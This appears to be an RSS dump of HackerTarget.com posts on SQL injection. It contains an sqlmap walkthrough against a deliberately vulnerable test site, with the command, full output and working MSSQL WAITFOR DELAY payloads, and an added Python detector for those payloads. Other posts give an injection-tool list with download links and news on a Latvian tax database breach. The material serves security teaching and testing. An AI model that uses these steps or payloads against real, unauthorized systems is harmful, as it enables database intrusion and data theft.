sql injection – HackerTarget.com (https://hackertarget.com)
Security Vulnerability Scanners and Assessments
Feed last built: Wed, 27 Apr 2022 06:52:09 +0000

sqlmap POST request injection
https://hackertarget.com/sqlmap-post-request-injection/
Thu, 24 May 2012 10:03:15 +0000

The post sqlmap POST request injection appeared first on HackerTarget.com.

In the past, using sqlmap to perform POST request based SQL injections has always been hit and miss (more often a miss). However, I have recently had to revisit this feature and have found it to be much improved, both in ease of use and accuracy.

This is a quick step-by-step guide to getting it working; we use Burp Proxy (Free Version) to intercept the POST request.

To perform POST request SQL injections you will need your own installation of sqlmap. To install sqlmap, use our sqlmap tutorial.

1. Browse to the target site http://testasp.vulnweb.com/Login.asp
2. Configure Burp Proxy: point the browser at Burp (127.0.0.1:8080) with intercept turned on in the Proxy tab.
3. Click the submit button on the login form.
4. Burp catches the POST request and holds it for you.

5. Copy the POST request to a text file; I have called it search-test.txt and placed it in the sqlmap directory.
6. Run sqlmap as shown below. The -r option tells sqlmap to read search-test.txt for the full POST request to work from, and -p names the parameter we are attacking.

./sqlmap.py -r search-test.txt -p tfUPass

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from 'search-test.txt'
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie
[13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass'
[13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application

>
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc
---

[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'

[*] shutting down at: 13:28:28
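As an added, defender-side example (not code from the post or from the sqlmap project), here is a small Python helper that reads a captured request in the layout `sqlmap -r` expects (request line, headers, blank line, URL-encoded body, as saved from Burp), decodes the POST parameters, and flags the ones whose values match the two payload shapes sqlmap reported above. The host and path come from the walkthrough; the signature patterns, the `build_request` helper and the constructed requests are this example's own assumptions.

```python
"""Parse the raw request file that `sqlmap -r` reads and flag form parameters
carrying the MSSQL stacked-query / time-based payload shapes shown in the
walkthrough output. Added example, not sqlmap or HackerTarget code."""
import re
from urllib.parse import parse_qsl, urlencode

# Signature patterns are this example's own assumptions, written to match the
# two payloads sqlmap reported above: WAITFOR DELAY, a quote-terminated stacked
# statement, and an SQL comment that discards the rest of the query.
INJECTION_SIGNATURES = [
    ("mssql time-based", re.compile(r"waitfor\s+delay\s+'", re.IGNORECASE)),
    ("stacked query", re.compile(r"'\s*;")),
    ("comment terminator", re.compile(r"--|/\*")),
]


def build_request(params, path="/Login.asp", host="testasp.vulnweb.com"):
    """Construct a Burp-style captured POST request (the search-test.txt layout:
    request line, headers, blank line, URL-encoded body). Sample data only."""
    body = urlencode(params)
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


def parse_raw_request(text):
    """Split a raw HTTP request into method, path, headers and decoded form
    parameters. Accepts either CRLF or LF line endings."""
    text = text.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    body = body.strip("\n")  # tolerate a trailing newline added by the editor
    lines = head.split("\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "method": method,
        "path": path,
        "version": version,
        "headers": headers,
        "body": body,
        "params": parse_qsl(body, keep_blank_values=True),
    }


def flag_parameters(params):
    """Return {parameter: [matched signature labels]} for values that look like
    the stacked-query or time-based payloads from the sqlmap run."""
    findings = {}
    for name, value in params:
        hits = [label for label, rx in INJECTION_SIGNATURES if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings


def triage(raw_text):
    """Parse a captured request and report which POST parameters carry payloads."""
    req = parse_raw_request(raw_text)
    return {"path": req["path"], "flagged": flag_parameters(req["params"])}


if __name__ == "__main__":
    clean = build_request({"tfUName": "test", "tfUPass": "test"})
    # Payload text copied from the sqlmap output above, constructed into a
    # request body as Burp would have captured it.
    injected = build_request({
        "tfUName": "test",
        "tfUPass": "test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC",
    })
    print(triage(clean))     # {'path': '/Login.asp', 'flagged': {}}
    print(triage(injected))  # flags tfUPass with all three signatures
```

The comment-terminator and stacked-query patterns are deliberately coarse and will match some legitimate values (a surname with an apostrophe followed by a semicolon, free text containing `--`), so treat the labels as triage hints for WAF or access-log review, with the time-based signature being the strongest indicator. The other signal a defender would correlate is the burst of HTTP 500 responses that sqlmap's own summary records for this run.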

Conclusion

It is that easy; the sqlmap project continues to push the boundaries of automated SQL injection discovery and exploitation.

SQL injection continues to be a favourite target of attackers.


SQL Injection Scanner List
https://hackertarget.com/sql-injection-scanner-list/
Fri, 22 Jul 2011 00:02:14 +0000

The post SQL Injection Scanner List appeared first on HackerTarget.com.

A few of the wide range of SQL injection scanning tools available, covering everything from detection to automated exploitation and shells on a plate.

Sqlninja ( http://sqlninja.sourceforge.net/ )
Supports only Microsoft SQL Server.

sqlmap ( http://sqlmap.org/ )
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.

Pangolin 3.2.3 free edition ( http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip )
Supports web applications using Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, SQLite3 and Sybase.
Features: auto-analysing keyword, HTTPS support, pre-login, bypass firewall setting, Injection Digger, data dumper, etc.

Havij v1.14 Advanced SQL Injection – free version ( http://www.itsecteam.com/files/havij/Havij1.14Free.rar )

When Neo Hacked the Latvian SRS Database
https://hackertarget.com/when-neo-hacked-the-latvian-srs-database/
Sat, 27 Feb 2010 06:09:38 +0000

The post When Neo Hacked the Latvian SRS Database appeared first on HackerTarget.com.

Movie plots cross into real life in Latvia, where a significant security breach has occurred in the hacking of the Latvian SRS database. A group of hackers has stirred the nation after hacking into the country's taxation website and revealing details of the powerful political elite's wages and bonuses. One of the hackers used the name Neo and has explained his motivations and reasons for the attack to a Latvian current affairs programme.

From The Matrix:
Trinity: Hello, Neo.
Neo: How do you know that name?
Trinity: I know a lot about you.
Neo: Who are you?
Trinity: My name's Trinity.
Neo: Trinity... THE Trinity? The one who hacked the IRS D-Base?
Trinity: That was a long time ago.
Neo: Jesus.
Trinity: What?
Neo: I just thought... you were a guy.
Trinity: Most guys do.

To the horror of Latvia’s political establishment, a mysterious group of computer hackers is threatening to expose the incomes of top officials after stealing millions of government tax records.

The group, calling itself the People’s Army of the Fourth Awakening, claimed to have downloaded more than 7.5 million documents, including VAT receipts and income tax returns, from the State Revenue Service (SRS) after exploiting a security loophole on its website.

One hacker used the name Neo, in apparent tribute to the hero of The Matrix science-fiction films, in which a vast system for enslaving humanity is exposed. He or she claimed that the documents revealed the extent of official hypocrisy over belt-tightening reforms introduced as Latvia’s economy reeled under the impact of the global economic crisis. “The purpose of the group is to unmask those who gutted the country,” Neo told the Latvian television current affairs programme Kas Notiek Latvija in an interview posted on its website.

Neo has been hailed as a digital Robin Hood by disgruntled Latvians after posting details from the documents on the internet to contrast the earnings of top officials with cuts experienced by other workers.

Reuters - Latvia web hacker nabbed after baring officials pay

SQL Injection Demystified
https://hackertarget.com/sql-injection-demystified/
Mon, 24 Aug 2009 09:35:27 +0000

The post SQL Injection Demystified appeared first on HackerTarget.com.

Dark Reading has a great article up on SQL injection. This form of attack has been around for a long time, and happens because of poor dynamic website coding practices. A simple SQL injection vulnerability can often be exploited to gain full access to the database and/or full control of the database server.

Several high-profile hacks over the past year, including:

  • Heartland Payment Systems
  • Hannaford Bros.
  • 7-11

all have had one thing in common: they were launched with a SQL injection attack.

Cross-site scripting (XSS) had been the king of Web attack techniques for some time, and for good reason -- the ability to steal user credentials, hijack active Web sessions and take action on behalf of a user without their knowledge is particularly nasty. But the classic SQL injection attack has regained the lead as the most popular of Web attacks. Most of all reported Web breaches the first half of this year, according to the new Web Hacking Incidents Database (WHID) report, were conducted via SQL injection. And SQL injection is one of the most common vulnerabilities in Web applications today.

To find out more about SQL injection, follow our tutorial, which includes explanations and examples. See: SQL Injection Tutorial
Link to the article referenced above:

Dark Reading - SQL Injection Demystified
